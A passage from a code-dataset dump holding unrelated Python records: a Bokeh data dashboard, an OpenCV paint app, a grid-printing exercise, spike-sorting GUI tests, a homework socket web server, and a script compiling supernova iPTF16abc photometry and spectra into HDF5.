\".pdf\")\n","sub_path":"DT_Bagging_AdaBoost/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"408234402","text":"import pandas as pd\n\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import layout, widgetbox\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.widgets import RangeSlider, Select\nfrom bokeh.plotting import figure\n\n\ndef load_data():\n data = pd.read_csv(\"data/PoliceKillingsUS.csv\", encoding=\"ISO-8859-1\")\n data[\"year\"] = data.date.apply(lambda x: int(\"20{}\".format(x.split(\"/\")[-1])))\n return data\n\n# input controls\ndata = load_data()\nyear = RangeSlider(title=\"Year\", start=data.year.min(), end=data.year.max(), value=(data.year.min(), data.year.max()))\nage = RangeSlider(title=\"Age\", start=data.age.min(), end=data.age.max(), value=(data.age.min(), data.age.max()))\nmanner_of_death = Select(title=\"Manner of death\", value=\"All\", options=[\"All\"] + data.manner_of_death.unique().tolist())\narmed = Select(title=\"Armed\", value=\"All\", options=[\"All\"] + data.armed.dropna().unique().tolist())\ngender = Select(title=\"Gender\", value=\"All\", options=[\"All\"] + data.gender.dropna().unique().tolist())\nrace = Select(title=\"Race\", value=\"All\", options=[\"All\"] + data.race.dropna().unique().tolist())\nthreat_level = Select(title=\"Threat level\", value=\"All\", options=[\"All\"] + data.threat_level.dropna().unique().tolist())\nflee = Select(title=\"Flee\", value=\"All\", options=[\"All\"] + data.flee.dropna().unique().tolist())\n\n\n\n\n\ndef update():\n data = load_data()\n\n # filter data based on controls\n data = data[(data.year >= year.value[0]) & (data.year <= year.value[1])]\n data = data[(data.age >= age.value[0]) & (data.age <= age.value[1])]\n data = data[data.manner_of_death == manner_of_death.value] if manner_of_death.value != \"All\" else data\n data = data[data.armed == armed.value] if armed.value != \"All\" else data\n data = data[data.gender == gender.value] if gender.value != \"All\" else data\n data = data[data.race == race.value] if race.value != \"All\" else data\n data = data[data.threat_level == threat_level.value] if threat_level.value != \"All\" else data\n data = data[data.flee == flee.value] if flee.value != \"All\" else data\n\n aggregated_data = data.groupby(\"state\").agg(\"size\")\n states = aggregated_data.index.tolist()\n counts = [x for x in aggregated_data]\n # return states, counts\n source.data = dict(states=states, counts=counts)\n\n# states, counts = select_data()\n\n\nsource = ColumnDataSource(data=dict(states=[], counts=[]))\nupdate()\n\n\n\n\ncontrols = [year, age, manner_of_death, armed, gender, race, threat_level, flee]\nfor control in controls:\n control.on_change('value', lambda attr, old, new: update())\nsizing_mode = 'fixed' # 'scale_width' also looks nice with this example\ninputs = widgetbox(*controls, sizing_mode=sizing_mode)\n\np = figure(x_range=source.data['states'], plot_height=350, plot_width=1000, toolbar_location=None, title=\"States counts\")\np.vbar(x='states', top='counts', width=0.9, source=source)\n\n\nl = layout([\n [inputs, p],\n], sizing_mode=sizing_mode)\n\n\n\ncurdoc().add_root(l)\n","sub_path":"myapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582376202","text":"import cv2\nimport numpy as np\nfrom objects import Mouse, Canvas, Button, MenuBar, ColorButton, CurrentColor, DropDown, CanvasDropDown, Label, Cursor\nfrom numpy import full, uint8\n\n\n\"\"\"\nChange mouse Color to new color.\n\"\"\"\ndef set_color(color):\n if Mouse.color == (255, 255, 255): Mouse.cursor_size = 1\n Mouse.color = color\n\ndef pencil_size(size):\n Mouse.cursor_size = size + 1\n\ndef set_erase():\n set_color((255, 255, 255))\n pencil_size(40)\n\ndef image_saturation_red(percent, canvas_class):\n new_image = np.copy(canvas_class.canvas)\n new_image[:, :, 0] = canvas_class.canvas[:,:,0] * ((10 - percent)/10)\n new_image[:, :, 1] = canvas_class.canvas[:,:,1] * ((10 - percent)/10)\n canvas_class.canvas = new_image\n\ndef image_saturation_green(percent,canvas_class):\n new_image = np.copy(canvas_class.canvas)\n new_image[:, :, 0] = canvas_class.canvas[:,:,0] * ((10 - percent)/10)\n new_image[:, :, 2] = canvas_class.canvas[:,:,1] * ((10 - percent)/10)\n canvas_class.canvas = new_image\n\ndef image_saturation_blue(percent,canvas_class):\n new_image = np.copy(canvas_class.canvas)\n new_image[:, :, 1] = canvas_class.canvas[:,:,1] * ((10 - percent)/10)\n new_image[:, :, 2] = canvas_class.canvas[:,:,2] * ((10 - percent)/10)\n canvas_class.canvas = new_image\n\ndef image_blur(percent,canvas_class):\n if percent > 0:\n new_image = cv2.blur(canvas_class.canvas,(2 * percent,2 * percent))\n canvas_class.canvas = new_image\n\n\"\"\"\nAdd objects to screenzzzz\n\"\"\"\ndef populate_frame(width):\n\n # Create elements to place on the screen\n canvas = Canvas(5, 75, 600, 390) # Must remain item 0 in OBJ array\n\n # Button(x,y,width,height,text,texsize,function)\n elements = []\n elements.append(canvas)\n elements.append(MenuBar(canvas, width))\n\n # Elements.append(Button(10, 10, 100, 50, \"Clear\", canvas.clear))\n elements.append(Button(10, 10, 55, 17, \"Save\", 0.6, canvas.export))\n elements.append(Button(10, 30, 55, 17, \"Load\" , 0.6, canvas.load))\n elements.append(Button(10, 50, 55, 17, \"Eraser\", 0.6, set_erase))\n\n elements.append(Cursor())\n\n # Color pallet default set (BGR) \n elements.append(ColorButton(230, 30, 15, 15, (255, 255, 255), set_color)) # Black\n elements.append(ColorButton(230, 10, 15, 15, (0, 0, 0), set_color)) # White\n elements.append(ColorButton(250, 30, 15, 15, (200, 200, 200), set_color)) # DarkGray\n elements.append(ColorButton(250, 10, 15, 15, (0, 0, 128), set_color)) # DarkRed\n elements.append(ColorButton(270, 30, 15, 15, (64, 64, 128), set_color)) # Brown\n elements.append(ColorButton(270, 10, 15, 15, (0, 0, 255), set_color)) # Red\n elements.append(ColorButton(290, 30, 15, 15, (128, 128, 255), set_color)) # Pink\n elements.append(ColorButton(290, 10, 15, 15, (0, 128, 255), set_color)) # Orange\n elements.append(ColorButton(310, 30, 15, 15, (128, 255, 255), set_color)) # Gold\n elements.append(ColorButton(310, 10, 15, 15, (0, 255, 255), set_color)) # Yellow\n elements.append(ColorButton(330, 30, 15, 15, (64, 128, 255), set_color)) # Tan\n elements.append(ColorButton(330, 10, 15, 15, (0, 255, 0), set_color)) # Green\n elements.append(ColorButton(350, 30, 15, 15, (0, 255, 128), set_color)) # Lime\n elements.append(ColorButton(350, 10, 15, 15, (255, 0, 0), set_color)) # Blue\n elements.append(ColorButton(370, 30, 15, 15, (255, 255, 0), set_color)) # Light Blue\n elements.append(ColorButton(370, 10, 15, 15, (160, 0, 0), set_color)) # Dark Blue\n \n # elements.append(ColorButton(230, 10, 15, 15, \"Eraser\",set_color)) # White\n # x, y, width, height, text, text_size, function):\n # Dropdown menu pencil size\n elements.append(DropDown(80, 10, 70, 20, [\"small\", \"medium\", \"large\"],(255,255,255) ,pencil_size, 0.6 ,canvas))\n\n # CanvasDropdown menu RGB saturation\n elements.append(Label(555,0,0.6,\"B#\"))\n\n elements.append(CanvasDropDown(550,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_saturation_blue, 0.5, canvas))\n elements.append(Label(503,0,0.6,\"G#\"))\n elements.append(CanvasDropDown(498,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_saturation_green, 0.5, canvas))\n elements.append(Label(449,0,0.6,\"R#\"))\n elements.append(CanvasDropDown(444,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_saturation_red, 0.5, canvas))\n # 555 0, 550 15\n # CanvasDropdown menu ImageBlur\n elements.append(Label(393,0,0.6,\"Blur\"))\n elements.append(CanvasDropDown(390,15,30,18, [\"0%\",\"10%\",\"20%\",\"30%\",\"40%\",\"50%\",\"60%\",\"70%\",\"80%\",\"90%\",\"100%\"], image_blur, 0.5, canvas))\n\n # This object displays the currently selected color\n elements.append(CurrentColor(180, 10, 35, 35))\n\n return elements, canvas\n\n\n\"\"\"\nMouse callback function.\n\"\"\"\ndef mouse_event(event, x, y, flags, elements):\n\n for obj in elements:\n obj.update(x, y, flags == 1)\n\n # Set the previous mouse position\n Mouse.x = x\n Mouse.y = y\n Mouse.press = Mouse.click != (flags == 1) and Mouse.click\n Mouse.release = Mouse.click != (flags == 1) and not Mouse.click\n Mouse.click = flags == 1\n\n\n\"\"\"\nDraw all elements on screen.\n\"\"\"\ndef draw(elements, screen):\n screen[:] = (225, 225, 225)\n for obj in elements:\n obj.draw(screen)\n\n\n\"\"\"\nMain function.\n\"\"\"\ndef main():\n \n title = \"MacroSoup Pain\" # Windows title\n fps = 30 # Frames per second\n\n window_width, window_height = 640, 480\n screen = full((window_height, window_width, 3), (0, 0, 0), dtype=uint8) # Frame to draw our object\n cv2.namedWindow(title) # Create a window\n\n elements, canvas = populate_frame(window_width)\n\n # Execute the 'mouse_event' function each time a mouse event is detected\n cv2.setMouseCallback(title, mouse_event, elements)\n\n draw(elements, screen)\n\n # Application loop\n while cv2.getWindowProperty(title, cv2.WND_PROP_VISIBLE) != 0:\n\n draw(elements, screen)\n\n # Display image\n cv2.imshow(title, screen)\n\n # Wait to display next image and get keystrokes\n key = cv2.waitKey(1000 // fps) & 0xFF\n\n if key == ord(\"z\"):\n canvas.undo()\n elif key == ord(\"c\"):\n canvas.clear()\n\n # Close the window upon exiting application loop\n cv2.destroyWindow(title)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"574935158","text":"'''\nelmar_m / 22e88@mailbox.org\n-------------------------------\nLesson02: Grid Printer Exercise\n'''\n\n'''\nPart 1:\nHardcoded and primitive, executed once when \nmodule is imported or file is executed doing a\n\"python grid_printer.py\".\n'''\n\n\na_line_hardcoded = '+' + '----' + '+' + '----' + '+'\nb_line_hardcoded = '|' + ' ' + '|' + ' ' + '|'\n\nprint(a_line_hardcoded)\n\nfor z in range(2):\n for i in range(4):\n print(b_line_hardcoded)\n print(a_line_hardcoded)\n\n'''\nPart 2:\nA function with one argument. Recycling my function\nfrom part 3 by removing the second function argument\nand instead putting it hardcoded into the function body.\n'''\n\n\ndef gprint_single(number):\n '''\n print a grid with rows and\n columns a fixed size for width and height.\n '''\n unit = 4\n\n a_part = '+' + unit * '-'\n b_part = '|' + unit * ' '\n\n a_full = number * a_part + '+'\n b_full = number * b_part + '|'\n\n print(a_full)\n\n for n in range(number):\n for i in range(unit):\n print(b_full)\n print(a_full)\n\n'''\nPart 3:\n'''\n\n\ndef gprint(number, unit):\n '''\n print a grid with rows and\n columns and width and height.\n '''\n\n a_part = '+' + unit * '-'\n b_part = '|' + unit * ' '\n\n a_full = number * a_part + '+'\n b_full = number * b_part + '|'\n\n print(a_full)\n\n for n in range(number):\n for i in range(unit):\n print(b_full)\n print(a_full)\n\nif __name__ == '__main__':\n print('i wanna be a module, please import me!')\n","sub_path":"students/elmar_m/lesson02/grid_printer.py","file_name":"grid_printer.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"160053650","text":"from tridesclous import *\nimport pyqtgraph as pg\nfrom matplotlib import pyplot\n\ndef get_spikesorter():\n spikesorter = SpikeSorter(dirname = '../../tests/datatest')\n #~ spikesorter = SpikeSorter(dirname = '../../tests/datatest_neo')\n print(spikesorter.summary(level=1))\n spikesorter.detect_peaks_extract_waveforms(seg_nums = 'all', threshold=-5.,\n peak_sign = '-', n_span = 2, n_left=-30, n_right=50)\n #~ print(spikesorter.summary(level=1))\n spikesorter.project(method = 'pca', n_components = 5)\n spikesorter.find_clusters(7)\n spikesorter.refresh_colors(reset=True, palette = 'husl')\n #~ print(spikesorter.summary(level=1))\n spikesorter.construct_catalogue()\n\n return spikesorter\n\n\ndef test_traceviewer():\n app = pg.mkQApp()\n \n spikesorter = get_spikesorter()\n \n traceviewer = TraceViewer(spikesorter=spikesorter, mode = 'memory', signal_type = 'filtered')\n traceviewer.show()\n traceviewer.resize(800,600)\n \n app.exec_()\n \n\ndef test_traceviewer_linked():\n app = pg.mkQApp()\n spikesorter = get_spikesorter()\n \n traceviewer0 = TraceViewer(spikesorter=spikesorter, mode = 'memory', signal_type = 'filtered')\n traceviewer0.show()\n traceviewer0.resize(800,600)\n\n traceviewer1 = TraceViewer(spikesorter=spikesorter, shared_view_with = [traceviewer0], signal_type = 'unfiltered')\n traceviewer1.show()\n traceviewer1.resize(800,600)\n traceviewer0.shared_view_with.append(traceviewer1)\n \n app.exec_()\n\n\ndef test_peaklist():\n app = pg.mkQApp()\n spikesorter = get_spikesorter()\n \n peaklist = PeakList(spikesorter = spikesorter)\n peaklist.show()\n peaklist.resize(800,400)\n \n app.exec_()\n\ndef test_clusterlist():\n app = pg.mkQApp()\n spikesorter = get_spikesorter()\n \n clusterlist = ClusterList(spikesorter = spikesorter)\n clusterlist.show()\n clusterlist.resize(800,400)\n\n app.exec_()\n\ndef test_ndviewer():\n app = pg.mkQApp()\n spikesorter = get_spikesorter()\n \n ndscatter = NDScatter(spikesorter)\n ndscatter.show()\n \n app.exec_()\n\ndef test_waveformviewer():\n app = pg.mkQApp()\n spikesorter = get_spikesorter()\n \n waveformviewer = WaveformViewer(spikesorter)\n waveformviewer.show()\n \n app.exec_()\n\n\n\n\n\n\ndef test_cataloguewindow():\n app = pg.mkQApp()\n spikesorter = get_spikesorter()\n \n win = CatalogueWindow(spikesorter)\n win.show()\n \n app.exec_()\n\n\ndef test_cataloguewindow_from_classes():\n app = pg.mkQApp()\n \n dataio = DataIO(dirname = '../../tests/datatest')\n sigs = dataio.get_signals(seg_num=0)\n peakdetector = PeakDetector(sigs)\n peak_pos = peakdetector.detect_peaks(threshold=-4, peak_sign = '-', n_span = 5)\n waveformextractor = WaveformExtractor(peakdetector, n_left=-30, n_right=50)\n limit_left, limit_right = waveformextractor.find_good_limits(mad_threshold = 1.1)\n short_wf = waveformextractor.get_ajusted_waveforms()\n clustering = Clustering(short_wf)\n features = clustering.project(method = 'pca', n_components = 5)\n clustering.find_clusters(7)\n catalogue = clustering.construct_catalogue()\n \n \n win = CatalogueWindow.from_classes(peakdetector, waveformextractor, clustering, dataio = dataio)\n win.show()\n \n app.exec_() \n \n \nif __name__ == '__main__':\n #~ test_traceviewer()\n #~ test_traceviewer_linked()\n #~ test_peaklist()\n #~ test_clusterlist()\n #~ test_ndviewer()\n #~ test_waveformviewer()\n \n test_cataloguewindow()\n #~ test_cataloguewindow_from_classes()\n","sub_path":"tridesclous/gui/tests/test_cataloguewindow.py","file_name":"test_cataloguewindow.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"545000004","text":"# Jahrme Risner\n# Homework 4\n# 14 February 2018\n\nfrom socket import *\n\nHTTP_VERSION = \"HTTP/1.1 \"\nCONTENT_TYPE = \"\\nContent-type: text/html\\n\"\n\nHEADER_SUCCESS = \"200 OK\"\nHEADER_FAILURE = \"404 Not Found\"\n\n# Prepare a server socket (IPv4, TCP).\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\n# This eliminates wait time for address on restart.\n# (I did not notice any difference...)\nserverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\nserverPort = 8080\nserverSocket.bind((\"\", serverPort))\nserverSocket.listen(1)\n\nwhile True:\n print(\"Ready to serve...\")\n\n # Establish the connection.\n # This is the socket that will be used to return the HTML to the client.\n connectionSocket, addr = serverSocket.accept()\n message = connectionSocket.recv(1024).decode(\"utf-8\")\n\n # To get the method and filename:\n # Split the message string on spaces and return the first two elements.\n method, filename = message.split(\" \")[:2]\n\n header = None\n outputdata = None\n\n # Try to open requested file.\n # If file cannot be opened, serve 404.\n try:\n header = HTTP_VERSION + HEADER_SUCCESS + CONTENT_TYPE\n if filename[0] == \"/\": filename = filename[1:]\n file = open(filename)\n outputdata = file.read()\n except IOError:\n header = HTTP_VERSION + HEADER_FAILURE + CONTENT_TYPE\n filename = \"404.html\"\n file = open(filename)\n outputdata = file.read()\n\n # Sends success or failure depending on try/except block.\n connectionSocket.send(header.encode(\"utf-8\"))\n\n # Go through the outputdata and send it into connectionSocket.\n # Be sure to use .encode(\"utf-8\") to encode it into binary format.\n for token in outputdata:\n connectionSocket.send(token.encode(\"utf-8\"))\n\n connectionSocket.close()\n","sub_path":"hw-4/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"252028994","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2016 Yi Cao \n#\n# Distributed under terms of the GNU General Public License 3.0 license.\n\n\"\"\"\nThis program collects all data for the iPTF16abc paper into a single HDF5\nfile.\n\"\"\"\n\n\nimport numpy as np\nimport tables\nfrom astropy.io import ascii\nfrom astropy.time import Time\n\n\n# define photometry columns\nclass Photometry(tables.IsDescription):\n time = tables.Float64Col()\n flux = tables.Float32Col()\n flux_err = tables.Float32Col()\n mag = tables.Float32Col()\n mag_err = tables.Float32Col()\n telescope = tables.StringCol(16)\n instrument = tables.StringCol(16)\n filter_name = tables.StringCol(16)\n\n\nclass Spectroscopy(tables.IsDescription):\n wavelength = tables.Float32Col()\n flux_lambda = tables.Float32Col()\n\n\n# supernova data set\nclass SupernovaData(object):\n def __init__(self, filename):\n self._filename = filename\n self._fp = tables.open_file(filename, mode=\"a\")\n\n self._phot_table = self._fp.create_table(\n self._fp.root, \"photometry\", Photometry, \"Photometric Data\")\n self._phot_table.attrs.FIELD_0_UNIT = \"day\"\n self._phot_table.attrs.FIELD_1_UNIT = \"Jy\"\n self._phot_table.attrs.FIELD_2_UNIT = \"Jy\"\n self._phot_table.attrs.FIELD_3_UNIT = \"AB mag\"\n self._phot_table.attrs.FIELD_4_UNIT = \"AB mag\"\n\n self._spec_group = self._fp.create_group(\n self._fp.root, \"spectroscopy\", \"Spectroscopic Data\")\n\n def add_photometry(self, time, filter_name, flux, flux_err,\n mag, mag_err, telescope, instrument):\n row = self._phot_table.row\n row[\"time\"] = time\n row[\"filter_name\"] = filter_name\n row[\"flux\"] = flux\n row[\"flux_err\"] = flux_err\n row[\"mag\"] = mag\n row[\"mag_err\"] = mag_err\n row[\"telescope\"] = telescope\n row[\"instrument\"] = instrument\n row.append()\n\n def add_spec(self, time, telescope, instrument,\n wavelength, flux):\n if len(wavelength) != len(flux):\n raise InputError(\"len(wavelength) != \"\n \"len(flux)\")\n table_name = \"%s_%i\" % (instrument.replace(\"-\", \"_\"), int(time))\n tbl = self._fp.create_table(self._spec_group,\n table_name,\n Spectroscopy,\n table_name)\n tbl.attrs.FIELD_0_UNIT = \"Angstrom\"\n tbl.attrs.FIELD_1_UNIT = \"Arbitrary Unit\"\n tbl.attrs.OBS_DATE = time\n tbl.attrs.TELESCOPE = telescope\n tbl.attrs.INSTRUMENT = instrument\n row = tbl.row\n for w, f in zip(wavelength, flux):\n row[\"wavelength\"] = w\n row[\"flux_lambda\"] = f\n row.append()\n\n\nclass InputError(Exception):\n\n def __init__(self, msg):\n self.msg = msg\n\n def __expr__(self):\n return self.msg\n\n\ndef main():\n file_object = SupernovaData(\"iPTF16abc.h5\")\n\n # P48\n data_dict = {\"g\": \"lc/forcepsffitdiff_d100151_f1_c11.out\",\n \"R\": \"lc/forcepsffitdiff_d3381_f2_c10.out\"}\n for filter_name, filename in data_dict.iteritems():\n data = ascii.read(filename, format=\"ipac\")\n for item in data:\n if item[\"MJD\"] < 57470:\n continue\n if item[\"flux\"] >= 5. * item[\"sigflux\"]:\n file_object.add_photometry(\n item[\"MJD\"],\n filter_name,\n item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631,\n abs(item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631) *\n ((item[\"sigflux\"] / item[\"flux\"])**2 +\n (item[\"zprms\"] / 2.5)**2)**0.5,\n -2.5 * np.log10(item[\"flux\"]) + item[\"zpmag\"],\n ((2.5 * item[\"sigflux\"] / item[\"flux\"])**2 +\n item[\"zprms\"]**2)**0.5,\n \"P48\",\n \"CFH12K\")\n else:\n file_object.add_photometry(\n item[\"MJD\"],\n filter_name,\n item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631,\n abs(item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631) *\n ((item[\"sigflux\"] / item[\"flux\"])**2 +\n (item[\"zprms\"] / 2.5)**2)**0.5,\n -2.5 * np.log10(item[\"sigflux\"] * 5.) + item[\"zpmag\"],\n 99,\n \"P48\",\n \"CFH12K\")\n\n # P60\n with open(\"lc/Marshal_lc.txt\", \"r\") as fp_txt:\n for item in fp_txt:\n items = item.split(\",\")\n if len(items) < 3:\n continue\n if not items[7].startswith(\"\\\"P60\"):\n continue\n filter_name = items[2][1:-1]\n mag = float(items[4])\n mag_err = float(items[5])\n if mag > 90.:\n continue\n file_object.add_photometry(\n float(items[1]) - 2400000.5,\n filter_name,\n 10**(-mag/2.5) * 3631,\n 0.921 * mag_err * 10**(-mag/2.5) * 3631,\n mag,\n mag_err,\n \"P60\",\n \"SEDM\")\n\n # LCOGT\n with open(\"lc/iPTF16abc_lcophot.txt\", \"r\") as fp_txt:\n for item in fp_txt:\n items = item[:-1].split()\n MJD = float(items[1]) - 2400000.5\n mag = float(items[2])\n mag_err = float(items[3])\n filter_name = items[5]\n if filter_name == \"B\":\n flux = 10**(-mag / 2.5) * 4063 # Jy\n elif filter_name == \"V\":\n flux = 10**(-mag / 2.5) * 3636 # Jy\n else:\n flux = 10**(-mag / 2.5) * 3631\n flux_err = flux * 0.921 * mag_err\n file_object.add_photometry(\n MJD,\n filter_name,\n flux,\n flux_err,\n mag,\n mag_err,\n \"LCOGT-1m\",\n \"Sinistro\")\n\n # Swift Data\n with open(\"lc/swift_phot.txt\", \"r\") as fp_txt:\n for item in fp_txt:\n if item.startswith(\"#\"):\n continue\n items = item.split(\"\\t\")\n obs_time = Time(items[1], format=\"iso\", scale=\"utc\")\n if float(items[3]) < 5. * float(items[4]):\n continue\n file_object.add_photometry(\n obs_time.mjd,\n items[8].strip(),\n float(items[3]) * 1e-3,\n float(items[4]) * 1e-3,\n -2.5 * np.log10(float(items[3]) / 3.631e6),\n 1.0857 * float(items[4]) / float(items[3]),\n \"Swift\",\n \"UVOT\")\n\n # Spectra\n filename = \"spec/16abc_20160405_DCT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 7500)\n curve = curve[idx]\n file_object.add_spec(57483.26, \"DCT\", \"DeVeny\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160405_Gemini_N_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57483.88, \"Gemini-North\", \"GMOS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160406_Keck2_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 5500,\n curve[\"wavelength\"] < 8100)\n curve = curve[idx]\n file_object.add_spec(57484.51, \"Keck-II\", \"DEIMOS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160408_Keck2_v2.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 5500,\n curve[\"wavelength\"] < 8100)\n curve = curve[idx]\n file_object.add_spec(57486.51, \"Keck-II\", \"DEIMOS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160410_Keck1_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57488.38, \"Keck-I\", \"LRIS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160411_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57489.506,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160412_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57490.396,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160413_FTS_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57491.551,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160414_VLT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 30000)\n curve = curve[idx]\n file_object.add_spec(57492.20,\n \"VLT\", \"X-shooter\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160416_VLT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57494.00,\n \"VLT\", \"UVES\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160425_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57503.319,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160428_NOT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3600,\n curve[\"wavelength\"] < 8100)\n curve = curve[idx]\n file_object.add_spec(Time(\"2016-04-28\", format=\"iso\").mjd,\n \"NOT\", \"ALFOSC\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160430_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57508.272,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160510_Keck1_v2.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57518.42, \"Keck-I\", \"LRIS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160512_VLT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 30000)\n curve = curve[idx]\n file_object.add_spec(57520.03,\n \"VLT\", \"X-shooter\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160521_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 4000,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57529.405,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160603_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 4000,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57542.408,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160611_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 4000,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57550.402,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160623_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57562.379,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n return\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"data/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":13961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52943790","text":"def fib(n):\n#initial assignment based on where the series need to start\n a 